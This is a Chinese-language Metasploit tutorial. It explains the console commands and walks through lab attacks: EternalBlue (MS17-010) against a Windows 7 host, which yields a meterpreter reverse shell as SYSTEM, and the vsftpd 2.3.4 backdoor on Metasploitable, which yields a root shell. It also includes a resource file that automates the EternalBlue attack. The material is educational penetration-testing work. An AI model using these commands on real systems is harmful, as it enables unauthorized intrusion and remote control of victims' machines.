metasploit框架中包含数百个模块,在使用的过程中我们需要掌握一些特定的命令,以便更好的辅助我们来渗透

MSF终端命令

show expploits: 列出metasploit框架中的所有渗透攻击模块

show auxiliary: 列出metaspLot框架中所有辅助攻击模块

show options: 参数(options)是metasploit框架中各个模块正确运行所需的各种设置

如果当前没有进入任何模块输入show options可以修改全局参数,进入到相对应的模块输入shw options修改其对应模块各种需要设置的参数。使用back
命令可以返回metasploit的上一个状态

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
msf5 > show options 

Global Options:
===============

   Option            Current Setting    Description
   ------            ---------------    -----------
   ConsoleLogging    false              Log all console input and output
   LogLevel          0                  Verbosity of logs (default 0, max 3)
   MinimumRank       0                  The minimum rank of exploits that will run without explicit confirmation
   Prompt            msf5               The prompt string
   PromptChar        >                  The prompt character
   PromptTimeFormat  %Y-%m-%d %H:%M:%S  Format for timestamp escapes in prompts
   SessionLogging    false              Log all input and output for sessions
   TimestampOutput   false              Prefix all console output with a timestamp

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 >

当我们想找某个特定的渗透攻击、辅助或攻击载荷的时候,使用搜索search命令提高效率。如我们找ms17-010的渗透攻击模块,可以使用search ms17-010就会列出辅助模块和渗透攻击模块

1
2
3
4
5
6
7
8
9
10
11
12
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

找到攻击模块exploit/windows/smb/ms17_010_eternalblue后,使用use命令来加载模块,如下

1
2
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >

这里我们选择了exploit/windows/smb/ms17_010_eternalblue模块,这个时候终端中命令都会在这个攻击模块的环境中运行。在已选择的模块下输入show options会显示ms17-010模块所需的参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

show payloads: 列出metasploit框架中所有攻击载荷

这个命令和show options一样,只会将与当前模块兼容的攻击载荷现实出来,输入如下命令可以查看所有活动状态的攻击载荷

1
msf5 > show payloads

在上一个步骤中我们通过search找到了ms17-010的攻击模块。现在我们用show payloads命令查找适合这个攻击模块的攻击载荷。显出出了针windwos平台的攻击载荷,
在metasploit中一般会根据环境识别出在一次特定渗透攻击中所需要使用的攻击载荷,这里是截取其列出的一小部分…

1
2
3
4
5
6
7
8
9
10
msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads 

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   generic/custom                                               normal  No     Custom Payload
   1   generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
   2   generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline

接下来我们输入set payload windows/x64/meterpreter/reverse_tcp以选择reverse_tcp(反弹式TCP连接)攻击载荷,输入show options我们可以看到需要设置的一些参数,这个
例子中可以配置目标主机回连到攻击机的特定IP地址和端口号上,因此被称为反弹式的攻击载荷。在Requiredyes的为必须设置,no则为可选项

看到我们需要对这个攻击载荷LHOST本地主机和RHOST(远程主机)进行设置,将LHOST设置为我们攻击机的IP地址,远程主机将反向连接到攻击机默认的TCP端口(4444)当然可以自己设置端口,因为这种反弹式的回连适合存在防火墙和NAT网关的环境,可以设置防火墙一般会允许通行的常用端口号(443、80、8080之类的)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

show targets: 列出渗透攻击或模块所支持的目标平台

show targets可以列出当前模块下渗透攻击所支持的平台,如果涉及多个版本、不同的补丁级别的时候,我们需要先确定目标机器的版本然后再用set targeet指定其相关系统版本对应的Id号。如下我们查看到支持Windows 7 and Server 2008 R2 (x64) All Service Packs

1
2
3
4
5
6
7
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

info: 展示出指定渗透攻击或模块的相关详细信息

展示出指定渗透攻击或模块的相关详细信息,如果已经选择的相关模块,则直接在其模块下输入info

1
2
3
4
方法一:
info exploit/windows/smb/ms17_010_eternalblue
方法二:
msf5 exploit(windows/smb/ms17_010_eternalblue) > info

setunset: 设置和未设置

metasploit模块中所有参数只有两种状态:已设置set和未设置unset,使用set对命令可以对某个参数进行设置(同时启用该参数)使用unset命令可以禁用相关参数

setgunsetg: 这两个命令能对全局参数进行设置和清除,使用这个命令可以对那些经常使用但是又不常变动的参数进行设置

save:在使用setg命令对全局参数进行设置后,可以使用save命令将当前的设置值保存下来,这样在下次启动MSF终端的时候还可以用这些值。在一些情况下需要恢复原始状态只需要把其对应的文件删除或移动到其他位置

1
2
msf5 exploit(windows/smb/ms17_010_eternalblue) > save
Saved configuration to: /root/.msf4/config

0x02 使用MS17-010攻击

kali: 192.168.197.193
目标机: 192.168.197.195

第一步,使用search命令搜索ms17-010的攻击模块和辅助模块

1
2
3
4
5
6
7
8
9
10
11
12
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

第二步,使用辅助模块auxiliary/scanner/smb/smb_ms17_010确认目标机是否存在对应的漏洞,扫描结果是VULNERABLE to MS17-010说明存在漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.197.195
RHOSTS => 192.168.197.195
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.197.195                                                 yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit 

[+] 192.168.197.195:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.197.195:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

第三步,使用use加载渗透攻击模块exploit/windows/smb/ms17_010_eternalblue,设置对应的参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.197.195
RHOSTS => 192.168.197.195
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.197.193
LHOST => 192.168.197.193
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.197.195  yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.197.193  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

使用set RHOSTS指定目标主机IP地址,接下来是设置攻击载荷set payload windows/x64/meterpreter/reverse_tcp这个载荷在攻击成功后,会动目标主机
发起一个反弹连接,连接到LHOST中指定的IP地址,因为要把shell反弹到攻击机上,因此LHOST设置为攻击机IP

第四步,使用exploit命令初始化攻击环境,并对目标主机发起攻击,成功后会返回一个reverse_tcp方式的meterpreter会话

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.197.193:4444 
[+] 192.168.197.195:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.197.195:445 - Connecting to target for exploitation.
[+] 192.168.197.195:445 - Connection established for exploitation.
[+] 192.168.197.195:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.197.195:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.197.195:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.197.195:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.197.195:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.197.195:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.197.195:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.197.195:445 - Sending all but last fragment of exploit packet
[*] 192.168.197.195:445 - Starting non-paged pool grooming
[+] 192.168.197.195:445 - Sending SMBv2 buffers
[+] 192.168.197.195:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.197.195:445 - Sending final SMBv2 buffers.
[*] 192.168.197.195:445 - Sending last fragment of exploit packet!
[*] 192.168.197.195:445 - Receiving response from exploit packet
[+] 192.168.197.195:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.197.195:445 - Sending egg to corrupted connection.
[*] 192.168.197.195:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.197.195
[*] Meterpreter session 1 opened (192.168.197.193:4444 -> 192.168.197.195:65118) at 2020-02-14 13:46:51 +0800
[+] 192.168.197.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.197.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.197.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

使用session -l命令远程运行meterpreter情况,meterpreter -l-v可以查看每一个meterpreter会话的详细信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-LTME4DTVE8Q  192.168.197.193:4444 -> 192.168.197.195:65118 (192.168.197.195)

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -l -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter windows
        Info: NT AUTHORITY\SYSTEM @ WIN-LTME4DTVE8Q
      Tunnel: 192.168.197.193:4444 -> 192.168.197.195:65118 (192.168.197.195)
         Via: exploit/windows/smb/ms17_010_eternalblue
   Encrypted: true
        UUID: d32a7409c7ab99a4/x64=2/windows=1/2020-02-14T05:46:51Z
     CheckIn: 21s ago @ 2020-02-14 13:49:54 +0800
  Registered: No

sessions -i 1这个命令让与ID为1的控制会话进行交互,输入shell进入了目标系统交互命令shell中

1
2
3
4
5
6
7
8
9
10
msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3388 created.
Channel 1 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>whoami

0x03 测试metasploitable

这个例子我们通过扫描,然后使用vsftpd来进行测试

第一步,使用nmap扫描

1
2
3
4
5
6
7
8
9
10
msf5 > nmap -sT -A -PO 192.168.197.197
[*] exec: nmap -sT -A -PO 192.168.197.197

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-14 14:05 CST
Nmap scan report for 192.168.197.197
Host is up (0.046s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

第二步,搜索vsftpd渗透模块,配置所需参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads 

Compatible Payloads
===================

   #  Name               Disclosure Date  Rank    Check  Description
   -  ----               ---------------  ----    -----  -----------
   0  cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact 
payload => cmd/unix/interact
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.197.197
RHOSTS => 192.168.197.197
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.197.197  yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)

第三步,使用exploit命令执行,这里我们使用的使用了一个绑定bind交互式shell,是在目标主机上打开一个监听端口,然后促使我们可以直接与目标系统的连接如果是在防火墙或NAT网关后的主机,则应该使用反弹式连接攻击载荷

1
2
3
4
5
6
7
8
9
10
11
12
13
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit 

[*] 192.168.197.197:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.197.197:21 - USER: 331 Please specify the password.
[+] 192.168.197.197:21 - Backdoor service has been spawned, handling...
[+] 192.168.197.197:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.197.193:46319 -> 192.168.197.197:6200) at 2020-02-14 14:14:43 +0800

whoami
root
id
uid=0(root) gid=0(root)

0x04 资源文件

资源文件(resource file)是MSF终端内包含一系列自动化命令的脚本文件。这些文件时一个可以在MSF终端中执行的命令列表,列表中的命令将按顺序执行,举两个例子如下

一、创建一个现实metasploit版本的资源文件运行

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# echo version >resource.rc
root@kali:~# echo load sounds >>resource.rc
root@kali:~# msfconsole -r resource.rc 
......
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 5.0.46-dev
Console  : 5.0.46-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
[*] Starting persistent handler(s)...

二、创建一个ms17-010攻击的资源文件运行

1
2
3
4
5
6
7
8
root@kali:~# echo use exploit/windows/smb/ms17_010_eternalblue > pentest.rc
root@kali:~# echo set RHOSTS 192.168.197.195 >> pentest.rc
root@kali:~# echo set payload windows/x64/meterpreter/reverse_tcp >> pentest.rc
root@kali:~# echo set LHOST 192.168.197.193 >> pentest.rc
root@kali:~# echo exploit >> pentest.rc
root@kali:~# msfconsole -r pentest.rc 
......
meterpreter >

0x05 MSF终端命令参考列表

search: 搜索渗透攻击或辅助模块,可以模糊搜索也可以精确搜索

show options: 列出metasploit框架中的所有渗透攻击模块

show payloads: 列出metasploit框架中所有的攻击载荷

show auxiliary: 列出metasploit框架中的所有辅助攻击模块

search name: 查找metasploit框架中所有的渗透攻击和其他模块

info: 展示出指定渗透攻击或模块的相关信息

use name: 装载一个渗透攻击或模块

LHOST: 本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共的IP地址,为反弹式shell使用

RHOST:远程主机或目标主机

set function: 设置特定的配置参数,如设置本地或远程主机参数

setg function: 以全局方式设置特定的配置参数,如设置本地或远程主机参数

show options: 列出某个渗透攻击或模块中所有的配置参数

show targets: 列出渗透攻击所支持的平台

set target num: 指定你所知道的目标的操作系统以及补丁版本类型

set payload payload: 指定想要使用的攻击载荷

show advanced: 列出所有高级配置选项

set autorunscript migrate -f: 在渗透攻击完成后,将自动迁移到另一个进程

check: 检测目标是否对选定渗透攻击存在相应安全漏洞

exploit: 执行渗透攻击或模块来攻击目标

exploit -j: 在计划任务下进行渗透攻击(攻击将在后台进行)

exploit -z: 渗透攻击成功后不与会话进行交互

exploit -e encoder: 指定使用的攻击载荷编码方式

exploit -h: 列出exploit命令帮助信息

sessions -l: 列出可用的交互会话(在处理多个shell时使用)

sessions -l -v: 列出所有可用的交互会话以及会话详细信息,如攻击系统时使用什么安全漏洞

sessions -s script: 在所有活跃的Meterpreter会话中运行一个特定的meterpreter脚本

session -K: 杀死所有活跃的交互会话

session -c cmd: 在所有活跃的Meterpreter会话上执行一个命令

sessions -u sessionID: 升级一个普通的win 32 shell到meterpreter shell

db_create name: 创建一个数据库驱动攻击所要用使用的数据库

db_connect name: 创建并连接一个数据库驱动攻击所要使用的数据库

workspace: 列出当前连接的数据库中所有的工作空间

workspace name: 使用指定的工作空间

workspace -a name: 创建一个工作空间

workspace -d name: 删除指定的工作空间

workspace -D: 删除所有工作空间

workspace -r old new: 重命名工作空间

db_nmap: 利用nmap并把扫描数据存储到数据库中

db_rebuild_cache: 创建数据库缓存,这样在之后的搜索中会提升效率

db_disconnect: 断开当前数据库连接

db_connect: 连接指定的数据库(usr/share/metasploit-framework/config/database.yml

db_import: 导入数据库

db_export -f: 指定格式导出

route: 通过指定session路由流量

参考链接

metasploit渗透测试指南